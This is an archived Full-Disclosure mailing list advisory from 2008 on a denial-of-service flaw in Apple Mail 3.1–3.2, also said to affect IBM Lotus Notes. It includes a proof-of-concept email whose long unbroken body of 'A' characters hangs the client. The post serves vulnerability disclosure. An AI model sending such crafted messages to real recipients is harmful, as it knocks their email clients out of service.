[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)
- From: David Wharton <security@xxxxxxxxxxxxxxx>
- Date: Thu, 29 May 2008 19:31:39 -0500
***Summary***
A maliciously crafted e-mail message can cause a denial of service in
multiple versions of the Apple Mail email client.
***Scope***
Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)
Note: other versions of this product may be vulnerable as well; I have
not tested them. The vendor has been made aware of this issue and has
chosen not to treat it as a security issue.
Interestingly enough, a similar issue seems to be present in multiple
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z --
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611)
. The exploit provided in this advisory will also cause a denial of
service condition on multiple versions of IBM Lotus Notes. IBM has
been kind enough to create SPR# PRAD7DPKLW to address the issue the
exploit targets.
***Description***
An email message with a maliciously crafted body (in my tests I used a
long line) can cause the e-mail client to hang, resulting in a denial
of service condition. Testing with emails that do not have any
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line
consisting of 1.5 MB can cause the email clients to hang for over half
an hour.
Initial testing reveals the following:
In Apple Mail, the e-mail is rendered correctly in the preview pane
but a subsequent click on a different e-mail causes the application to
hang.
***Credits***
David Wharton
***References***
Apple Mail
http://www.apple.com/macosx/features/mail.html
***PoC Exploit***
Below is a sample e-mail with headers (some headers removed or
modified) that causes the e-mail clients to hang as discussed. Note
that the body is one long line and the "=" character is not part of;
it is there for formatting but in reality most of the body is one long
contiguous string of A's.
Subject: dos test
MIME-Version: 1.0
From: xxxxx@xxxxxxxxx
To: xxxxx@xxxxxxxxx
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@xxxxxxxxx>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@xxxxxxxxx
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@
<font
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</
font>N=
OTICE: This e-mail message and all attachments transmitted with it
may con=
tain confidential information intended solely for the use of the
addressee.=
<br />=
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/